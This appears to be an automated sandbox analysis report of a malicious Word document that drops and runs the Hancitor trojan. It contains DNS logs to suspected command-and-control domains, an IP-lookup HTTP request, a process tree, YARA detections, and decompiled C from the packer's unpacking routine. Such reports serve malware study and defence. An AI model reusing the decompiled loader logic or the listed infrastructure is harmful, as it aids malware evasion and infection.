                        Apr 26, 2023 12:40:40.002796888 CEST1.1.1.1192.168.2.20x1094Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.024929047 CEST1.1.1.1192.168.2.20xb12Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.355159044 CEST1.1.1.1192.168.2.20xc809Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.378177881 CEST1.1.1.1192.168.2.20xa424Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.401407957 CEST1.1.1.1192.168.2.20x8a9cName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.738831997 CEST1.1.1.1192.168.2.20x9382Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.762904882 CEST1.1.1.1192.168.2.20x37b9Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:40.787866116 CEST1.1.1.1192.168.2.20xe1d1Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.090845108 CEST1.1.1.1192.168.2.20xa9c2Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.113626003 CEST1.1.1.1192.168.2.20xe031Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.135936022 CEST1.1.1.1192.168.2.20xc2dName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.444036007 CEST1.1.1.1192.168.2.20x5117Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.469772100 CEST1.1.1.1192.168.2.20xc41aName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.492230892 CEST1.1.1.1192.168.2.20x7d31Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.802911997 CEST1.1.1.1192.168.2.20xdd8bName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.826251984 CEST1.1.1.1192.168.2.20x231aName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:41.853503942 CEST1.1.1.1192.168.2.20xcf0cName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.212874889 CEST1.1.1.1192.168.2.20xc2ebName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.241326094 CEST1.1.1.1192.168.2.20xa6fdName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.270170927 CEST1.1.1.1192.168.2.20x8f9eName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.582838058 CEST1.1.1.1192.168.2.20xf76aName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.605921984 CEST1.1.1.1192.168.2.20xb0adName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.633482933 CEST1.1.1.1192.168.2.20x8a0Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.958575010 CEST1.1.1.1192.168.2.20x9b04Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:42.981571913 CEST1.1.1.1192.168.2.20xadd2Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.003921032 CEST1.1.1.1192.168.2.20x2a2Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.290258884 CEST1.1.1.1192.168.2.20x132aName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.313549042 CEST1.1.1.1192.168.2.20x561eName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.340131044 CEST1.1.1.1192.168.2.20x8d9aName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.662470102 CEST1.1.1.1192.168.2.20xcff2Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.694881916 CEST1.1.1.1192.168.2.20x1be0Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:43.716932058 CEST1.1.1.1192.168.2.20x57e2Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.080571890 CEST1.1.1.1192.168.2.20xda0cName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.102775097 CEST1.1.1.1192.168.2.20xc19bName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.137711048 CEST1.1.1.1192.168.2.20x91c5Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.512366056 CEST1.1.1.1192.168.2.20x2e30Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.536534071 CEST1.1.1.1192.168.2.20x153Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.562237978 CEST1.1.1.1192.168.2.20xa5ceName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.900705099 CEST1.1.1.1192.168.2.20x1219Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.924582958 CEST1.1.1.1192.168.2.20x2736Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:44.950586081 CEST1.1.1.1192.168.2.20x62d8Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.284423113 CEST1.1.1.1192.168.2.20x6960Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.310177088 CEST1.1.1.1192.168.2.20xf74Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.418833971 CEST1.1.1.1192.168.2.20x70d9Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.662261009 CEST1.1.1.1192.168.2.20x2acaName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.749931097 CEST1.1.1.1192.168.2.20x3e20Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:45.773190975 CEST1.1.1.1192.168.2.20x9a89Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.049410105 CEST1.1.1.1192.168.2.20x7fbName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.072554111 CEST1.1.1.1192.168.2.20x1fc8Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.095721006 CEST1.1.1.1192.168.2.20xeb1eName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.505765915 CEST1.1.1.1192.168.2.20xea7Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.531084061 CEST1.1.1.1192.168.2.20x5009Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.553757906 CEST1.1.1.1192.168.2.20x8c3cName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.789335012 CEST1.1.1.1192.168.2.20xc7bcName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.812459946 CEST1.1.1.1192.168.2.20xae9eName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:46.834851980 CEST1.1.1.1192.168.2.20x175Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.211368084 CEST1.1.1.1192.168.2.20x9b71Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.236119986 CEST1.1.1.1192.168.2.20x4367Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.258780003 CEST1.1.1.1192.168.2.20xad00Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.776082993 CEST1.1.1.1192.168.2.20xaee0Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.807192087 CEST1.1.1.1192.168.2.20x681dName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:47.831384897 CEST1.1.1.1192.168.2.20x3802Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.171818972 CEST1.1.1.1192.168.2.20x811fName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.197411060 CEST1.1.1.1192.168.2.20x8255Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.224894047 CEST1.1.1.1192.168.2.20x94cName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.558142900 CEST1.1.1.1192.168.2.20xb9d3Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.582465887 CEST1.1.1.1192.168.2.20xb0d8Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.609962940 CEST1.1.1.1192.168.2.20x53e2Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.924309015 CEST1.1.1.1192.168.2.20x1c1Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.952579975 CEST1.1.1.1192.168.2.20x51daName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:48.975481033 CEST1.1.1.1192.168.2.20x35f4Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.288851976 CEST1.1.1.1192.168.2.20xe16fName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.396830082 CEST1.1.1.1192.168.2.20xeb39Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.424974918 CEST1.1.1.1192.168.2.20xb10aName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.727621078 CEST1.1.1.1192.168.2.20xaabdName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.752779961 CEST1.1.1.1192.168.2.20x7779Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:49.775194883 CEST1.1.1.1192.168.2.20x22abName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.153306961 CEST1.1.1.1192.168.2.20x1d2dName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.202167034 CEST1.1.1.1192.168.2.20xd9a3Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.226310015 CEST1.1.1.1192.168.2.20x6534Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.540467024 CEST1.1.1.1192.168.2.20x107eName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.639211893 CEST1.1.1.1192.168.2.20x991fName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.667124987 CEST1.1.1.1192.168.2.20xefName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:50.998275042 CEST1.1.1.1192.168.2.20x84c7Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.021219969 CEST1.1.1.1192.168.2.20xf1a0Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.043221951 CEST1.1.1.1192.168.2.20x4f20Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.486870050 CEST1.1.1.1192.168.2.20x971Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.510288000 CEST1.1.1.1192.168.2.20x2514Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.537064075 CEST1.1.1.1192.168.2.20x4374Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.820130110 CEST1.1.1.1192.168.2.20x210cName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.878207922 CEST1.1.1.1192.168.2.20x690dName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:51.907179117 CEST1.1.1.1192.168.2.20xf536Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.262532949 CEST1.1.1.1192.168.2.20x8326Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.296350956 CEST1.1.1.1192.168.2.20xd821Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.319746017 CEST1.1.1.1192.168.2.20x8d50Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.690046072 CEST1.1.1.1192.168.2.20xbfc9Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.715807915 CEST1.1.1.1192.168.2.20xba82Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:52.739593983 CEST1.1.1.1192.168.2.20xa7ceName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.091914892 CEST1.1.1.1192.168.2.20x2b58Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.119884968 CEST1.1.1.1192.168.2.20x38f5Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.146445036 CEST1.1.1.1192.168.2.20x150cName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.405312061 CEST1.1.1.1192.168.2.20xe464Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.431116104 CEST1.1.1.1192.168.2.20x3ad5Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.454761028 CEST1.1.1.1192.168.2.20xef88Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.893270016 CEST1.1.1.1192.168.2.20xf92bName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.919015884 CEST1.1.1.1192.168.2.20xb26bName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:53.945333958 CEST1.1.1.1192.168.2.20x4409Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.289617062 CEST1.1.1.1192.168.2.20xdd25Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.405143023 CEST1.1.1.1192.168.2.20x2f98Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.432691097 CEST1.1.1.1192.168.2.20xb2f5Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.856998920 CEST1.1.1.1192.168.2.20x52e8Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.901833057 CEST1.1.1.1192.168.2.20xbe71Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:54.960994005 CEST1.1.1.1192.168.2.20x9761Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.357189894 CEST1.1.1.1192.168.2.20x9be4Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.394107103 CEST1.1.1.1192.168.2.20x56e2Name error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.421226025 CEST1.1.1.1192.168.2.20xa2ccName error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.714649916 CEST1.1.1.1192.168.2.20xf1afName error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.776762009 CEST1.1.1.1192.168.2.20x6bbName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:55.800337076 CEST1.1.1.1192.168.2.20x2880Name error (3)rhopulforopme.runonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:56.161516905 CEST1.1.1.1192.168.2.20x2441Name error (3)thowerteigime.comnonenoneA (IP address)IN (0x0001)false
                        Apr 26, 2023 12:40:56.206511974 CEST1.1.1.1192.168.2.20x25cbName error (3)euvereginumet.runonenoneA (IP address)IN (0x0001)false
                        • api.ipify.org
                        Session ID: 0
                        Source IP: 192.168.2.2
                        Source Port: 49759
                        Destination IP: 64.185.227.155
                        Destination Port: 80
                        Process: C:\Windows\SysWOW64\rundll32.exe

                        Timestamp | kBytes transferred | Direction | Data
                        Apr 26, 2023 12:39:09.115633011 CEST | 46 | OUT | GET / HTTP/1.1
                        Accept: */*
                        User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                        Host: api.ipify.org
                        Cache-Control: no-cache
                        Apr 26, 2023 12:39:09.263889074 CEST | 46 | IN | HTTP/1.1 200 OK
                        Content-Length: 14
                        Content-Type: text/plain
                        Date: Wed, 26 Apr 2023 10:39:09 GMT
                        Vary: Origin
                        Data Raw: 31 30 32 2e 31 32 39 2e 31 34 33 2e 31 34
                        Data Ascii: 102.129.143.14


                        Target ID:1
                        Start time:12:38:57
                        Start date:26/04/2023
                        Path:C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE
                        Wow64 process (32bit):false
                        Commandline:C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\0524_4109399728218.doc" /o "
                        Imagebase:0x7ff7bdf50000
                        File size:1967408 bytes
                        MD5 hash:D244700A767CE9846760CA8AA9574EDE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Target ID:2
                        Start time:12:39:00
                        Start date:26/04/2023
                        Path:C:\Windows\splwow64.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\splwow64.exe 12288
                        Imagebase:0x7ff759f50000
                        File size:132096 bytes
                        MD5 hash:7FE20527607797A8DADE19838B8B1573
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Target ID:4
                        Start time:12:39:04
                        Start date:26/04/2023
                        Path:C:\Windows\System32\rundll32.exe
                        Wow64 process (32bit):false
                        Commandline:rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAX
                        Imagebase:0x7ff6c02f0000
                        File size:71168 bytes
                        MD5 hash:F68AF942FD7CCC0E7BAB1A2335D2AD26
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Target ID:5
                        Start time:12:39:04
                        Start date:26/04/2023
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe c:\users\user\appdata\roaming\microsoft\word\startup\ket.t,EUAYKIYBPAX
                        Imagebase:0x220000
                        File size:61952 bytes
                        MD5 hash:D0432468FA4B7F66166C430E1334DBDA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Yara matches:
                        • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Hancitor_6738d84a, Description: unknown, Source: 00000005.00000002.2668727144.00000000028D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Hancitor_6738d84a, Description: unknown, Source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Hancitor, Description: Hancitor Payload, Source: 00000005.00000002.2673527678.00000000042D0000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                        • Rule: JoeSecurity_Hancitor, Description: Yara detected Hancitor, Source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: Windows_Trojan_Hancitor_6738d84a, Description: unknown, Source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                        • Rule: Hancitor, Description: Hancitor Payload, Source: 00000005.00000002.2668984250.00000000028E0000.00000040.00001000.00020000.00000000.sdmp, Author: kevoreilly
                        Reputation:moderate

                          Execution Graph

                          Execution Coverage:2.4%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:18.7%
                          Total number of Nodes:481
                          Total number of Limit Nodes:15

                          Control-flow Graph

                          C-Code - Quality: 96%
                          			E02861584(intOrPtr __eax, void* __ebx) {
                          				intOrPtr _v8;
                          				intOrPtr _v12;
                          				intOrPtr _v16;
                          				intOrPtr _v20;
                          				intOrPtr _v24;
                          				intOrPtr _v28;
                          				intOrPtr _v32;
                          				intOrPtr _v36;
                          				intOrPtr _v40;
                          				intOrPtr _v44;
                          				intOrPtr _v48;
                          				long _v52;
                          				intOrPtr _v56;
                          				intOrPtr _v60;
                          				intOrPtr _v64;
                          				intOrPtr _v68;
                          				intOrPtr _v72;
                          				intOrPtr _v76;
                          				intOrPtr _v80;
                          				intOrPtr _v84;
                          				intOrPtr _v88;
                          				intOrPtr _v92;
                          				intOrPtr _v96;
                          				intOrPtr _t76;
                          				intOrPtr* _t81;
                          				intOrPtr _t85;
                          				intOrPtr* _t87;
                          				intOrPtr _t89;
                          				void* _t110;
                          				signed int* _t113;
                          				signed int* _t114;
                          				signed int* _t121;
                          				intOrPtr _t124;
                          				struct HICON__* _t125;
                          				signed int* _t126;
                          				int _t129;
                          				int _t130;
                          				signed int* _t131;
                          				struct HICON__* _t236;
                          				signed int* _t237;
                          				struct HICON__* _t240;
                          				struct HICON__* _t241;
                          				struct HICON__* _t242;
                          				struct HICON__* _t243;
                          				struct HICON__* _t244;
                          				struct HICON__* _t245;
                          				struct HICON__* _t246;
                          				struct HICON__* _t247;
                          				struct HICON__* _t248;
                          				struct HICON__* _t249;
                          				struct HICON__* _t250;
                          				struct HICON__* _t251;
                          				struct HICON__* _t252;
                          				struct HICON__* _t253;
                          				struct HICON__* _t254;
                          				struct HICON__* _t255;
                          				struct HICON__* _t256;
                          				struct HICON__* _t257;
                          				struct HICON__* _t258;
                          				struct HICON__* _t259;
                          				struct HICON__* _t260;
                          				struct HICON__* _t261;
                          				struct HICON__* _t262;
                          				struct HICON__* _t263;
                          				struct HICON__* _t264;
                          				struct HICON__* _t265;
                          				struct HICON__* _t266;
                          				struct HICON__* _t267;
                          				struct HICON__* _t268;
                          				struct HICON__* _t269;
                          				struct HICON__* _t270;
                          				signed int* _t271;
                          				signed int* _t318;
                          				intOrPtr _t362;
                          				intOrPtr _t368;
                          				intOrPtr _t373;
                          				intOrPtr _t376;
                          				intOrPtr _t377;
                          				intOrPtr _t378;
                          
                          				_t376 = _t377;
                          				_t378 = _t377 + 0xffffffa4;
                          				_v96 = __eax;
                          				_v88 = 0x64c;
                          				_v72 = 0x5f2;
                          				_v76 = 0x980;
                          				_v80 = 0x10f6;
                          				_v84 = 0x1484;
                          				_v92 = 0x1bf0;
                          				_v32 = 0x83f0;
                          				_v40 = 2;
                          				_v44 = 0x7b;
                          				_v48 = 0;
                          				_t362 =  *0x2865668; // 0x27d0000
                          				_t76 = E027EE1F8(_t362, 1, 0x1205, "gyy"); // executed
                          				 *0x2865d10 = _t76;
                          				_v72 = 0x569f6c;
                          				do {
                          					GetEnhMetaFileW(0x2861ffc); // executed
                          					GetEnhMetaFileW(0x2861ffc);
                          					_v72 = _v72 - 1;
                          				} while (_v72 != 0);
                          				_v8 = _t378;
                          				_v8 = _v8 + 0xa8;
                          				_v12 = _t376;
                          				_v12 = _v12 + 0x64;
                          				_v16 =  *0x02865658;
                          				_v20 =  *0x02865654;
                          				_t81 =  *0x2865d10; // 0x41d2090
                          				_v52 =  *((intOrPtr*)( *_t81))();
                          				 *0x2865d14 = E027D277C(_v52);
                          				_t368 =  *0x2865d14; // 0x41d20b0
                          				_t85 =  *0x2865d10; // 0x41d2090
                          				E027EDB30(_t85, _v52, _t368);
                          				_t87 =  *0x2865d14; // 0x41d20b0
                          				_v28 =  *_t87;
                          				_t89 =  *0x2865d14; // 0x41d20b0
                          				 *0x2865d14 = _t89 + 4;
                          				_v64 = 0x1c33;
                          				_v68 = 0x1909;
                          				AddFontResourceA(0x2861ffc);
                          				AddFontResourceA(0x2861ffc);
                          				AddFontResourceA(0x2861ffc);
                          				AddFontResourceA(0x2861ffc);
                          				AddFontResourceA(0x2861ffc);
                          				AddFontResourceA(0x2861ffc);
                          				AddFontResourceA(0x2861ffc);
                          				AddFontResourceA(0x2861ffc);
                          				AddFontResourceA(0x2861ffc);
                          				AddFontResourceA(0x2861ffc);
                          				AddFontResourceA(0x2861ffc);
                          				AddFontResourceA(0x2861ffc);
                          				 *0x2865d20 = GetProcAddress(LoadLibraryA("kernel32"), "VirtualAllocEx");
                          				_t110 = VirtualAllocEx(0xffffffff, 0, _v52, _v64 - 0xc33, _v68 - 0x18c9); // executed
                          				 *0x2865d1c = _t110;
                          				E027D6F10();
                          				_t113 =  *0x2865d1c; // 0x28d7800
                          				 *0x2865d18 = _t113;
                          				_t114 =  *0x2865d18; // 0x28cfffc
                          				 *0x2865d18 = _t114 - 4;
                          				_v56 = 0;
                          				_v60 = 0;
                          				while(_v56 < _v52) {
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					_t373 =  *0x2865d14; // 0x41d20b0
                          					_t318 =  *0x2865d1c; // 0x28d7800
                          					E027D6F08(_t318 + _v60, _t373 + _v56);
                          					_v60 = _v60 + _v44;
                          					_v56 = _v56 + _v44;
                          					_v56 = _v56 + _v48;
                          				}
                          				_v84 = 0x8a58a;
                          				_v72 = 0;
                          				while(_v72 < _v28) {
                          					_t125 = LoadCursorW(0, 0xe49);
                          					_t126 =  *0x2865d1c; // 0x28d7800
                          					_t129 = DeleteObject(0);
                          					_t130 = DeleteObject(0);
                          					_t131 =  *0x2865d1c; // 0x28d7800
                          					 *_t131 = _t125 +  *_t126 + _v72 + _t129 - _t130;
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
                          					AddFontResourceA(0x2861ffc);
